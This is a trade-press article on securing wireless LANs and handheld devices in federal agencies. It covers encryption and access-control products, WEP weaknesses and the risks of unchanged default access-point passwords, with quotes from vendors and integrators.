Mobilizing security

Growth of wireless applications drives need for greater protection

More and more federal agencies are cutting the wires that tether people to desktop PCs. Thanks to wireless networking, laptop users can now roam the office without losing their connection to the local- area network. Outside the office, workers can use wireless phones and handheld devices to tap into the Internet.

But along with the convenience and flexibility of wireless networking come concerns about security. Addressing those concerns requires an end-to-end approach that takes into account the security of the portable device, the wireless transmission of data and the handling of data back at the office.

In the government, security issues are governed by an edict that requires certain agencies and departments using wireless solutions to plug their security holes by 2002.

The criteria for evaluating security for information deemed sensitive but unclassified are specified in Federal Information Processing Standard Publication 140-1 from the National Institute of Standards and Technology. Many vendors are rushing to obtain FIPS 140-1 certification for their products so they can bid on government contracts.

The security of wireless LANs, which use internal gateways or access points, is generally considered easier to control than the security of wireless handheld devices, which rely on the services of an outside telecommunications company.

On the other hand, the limited functionality of most wireless devices today makes them less vulnerable to security breaches by malicious hackers, said Chris Klaus, founder and chief technology officer at Internet Security Systems Inc. He likens those devices to "old DOS PCs, which were very secure because they had no services running." Later, the Microsoft Corp. Windows operating system added services to PCs that provided openings for hackers, he said.

Others see similarities in the security of wireless LANs and the networks handheld devices use. Access control is "the foundation of security for both technologies," said John Muir, president of the North American division of Pointsec Mobile Technologies Inc.

Most attempts to address wireless security focus on data while it is in transit between sender and receiver. At Pointsec, "we deal with data the other 98 percent of the time, when it is resting on the mobile device," Muir said.

"The problem is that the portable client device may reside outside the firewall perimeter," he said. "Organizations are concerned about the privacy of the data stored on the device and the access that a device may provide to internal systems."

Several agencies, including the departments of Defense and Justice, are evaluating or deploying Pointsec technology, Muir said.

The company's technology is designed to prevent a portable device from being used by anyone other than the authorized user. It uses password-based access control and encrypts data in the portable device with "hard" (128-bit or greater) encryption algorithms, Muir said. Point.sec offers access-control software for both wireless LAN-enabled notebooks and handheld devices, but hard encryption is currently available only for notebooks, which have fewer processing limitations.

The Office of Naval Research recently selected Pointsec 4.0 to secure mission-critical data on laptop and desktop computers used by dispersed ground forces who connect wirelessly to joint forces ashore and at sea. Officials are using the technology as part of their Extending the Littoral Battlespace Advanced Concept Technology Demonstration.

"An important part of the approval process at the Navy was the user- friendliness of the solution," Muir said. "Our encryption occurs on the fly, so users don't even know it is there. That was very important to the Navy."

Navy officials are also interested in how Pointsec technology can make the access controls on Palm Inc. devices as easy to use as possible. Pointsec's PicturePIN uses a series of symbol displays that must be tapped in the right order for access to be granted.

"Essentially, the user remembers his password by making up a story: "A man walked on a beach carrying a news.paper,'" Muir said. The user "taps the symbol of a man, a beach ball and a newspaper in the proper order. The order of the symbols is scrambled with each log-in to prevent "over the shoulder' hacking. Without the story, the symbols are meaningless."

To George Brostoff, president of Ensure Technologies Inc., the problem with most access-control schemes is the lack of attentiveness by users after they've logged in. Users of wireless laptops are often oblivious to the threat posed by leaving a connected computer unattended—especially inside the office.

"Study after study has shown that the biggest security threat is from people inside the organization, not outside," Brostoff said.

With Ensure's XyLoc, a small radio "lock" device is attached to a laptop and the authorized user is issued a key card or key fob. When the user approaches the laptop, the card or fob communicates with the device, which grants access to the computer after authenticating the user's identity. If the user steps away from the computer, access is automatically denied. The user "doesn't have to log in each time he wants to use the wireless device," Brostoff said. A version of XyLoc for handheld devices is in the works.

Securing access, of course, is only one part of the security puzzle. In February, a study conducted at the University of California, Berkeley, confirmed what Jim Gemmel, senior signals analyst for systems integrator CACI International Inc., and others have been saying about wireless security for more than a year: Data traffic is susceptible to interception and eavesdropping.

"The wireless modems used with [personal digital assistants] and other mobile devices operate in the 2.46 GHz range and provide absolutely no security," Gemmel said. "Wireless LANs using the 802.11b Ethernet standard offer Wired Equivalent Privacy amounting to a 40-bit encryption scheme. Not only is the encryption level vulnerable, the encryption key is sent with each frame, so by examining each packet, a hacker can reconstruct the encryption key and decrypt the traffic. That's what they did at UC Berkeley."

And encryption can only work if it is enabled on the wireless system itself, which is often not the case, according to Klaus. He said that because wireless LAN devices are inexpensive—with base stations costing less than $800 and wireless notebook PC Cards costing less than $125—many organizations are deploying the technology without consulting security experts.

In many cases, Klaus said, users don't change the default administrative passwords on their wireless LAN access points, providing ready access to an organization's LANs by "drive-by hackers."

"We have literally driven through the business districts of many major cities with a laptop and wireless PC Card and gotten access to many LANs belonging to businesses occupying offices in the buildings on either side of the street," Klaus said.

Although he is dubious about the efficacy of a drive-by approach given the limited signaling distances of most wireless LAN transceivers, Robert Manchise, chief scientist for integrator Anteon Corp., agrees that users can compromise their networks by deploying wireless technology on their own. "Most users simply aren't thinking about the security ramifications, and integrators often have little input," he said.

Improving wireless security will require the efforts of vendors, customers and integrators, Manchise and others say. Vendors must make their products more secure out of the box. Customers need to be more aware of security issues. And integrators need to become involved in designing networks with security technologies to protect against wireless intruders.

Mobile-device manufacturers are beginning to make their products more secure. John Inkley, manager of federal sales at Palm, said that although "we don't ship the product with a security or encryption technology, custom key encryption solutions are available from our partners." He said those technologies "are adequate for most of our government clients. In classified data environments, no one uses the public airwaves to transmit data."

Wireless LAN vendors such as 3Com Corp. are beginning to make security "a mantra," according to John Temple, territory manager for civilian and federal sales with 3Com's offices in Tysons Corner, Va. He said 3Com's list of wireless "wins" in government has been growing and include Justice's Executive Office for Immigration Review, the U.S. Probationary Courts in Chicago and the Senate. 3Com's access-point product requires the user to change the administrative password as one of the first steps, eliminating a common hacking problem. The products are also designed to be deployed within the secure environment of 3Com's wired network technologies, Temple said.

In many ways, wireless security is similar to wired Ethernet security, Klaus said. "Ethernet itself is not very secure. You need to take measures to lock it down. Wireless merely increases the problem. Since traffic is broadcast through the air, you don't need to hijack a connection.

"Companies are going to need to build security into their wired networks and applications to cope with wireless. And they are going to need intrusion- detection capabilities to look for bad activity on an ongoing basis."

Toigo is an independent consultant and author specializing in business automation issues. He can be reached via his Web site at www.toigoproductions.com.

NEXT STORY: NSF plugs researchers into grid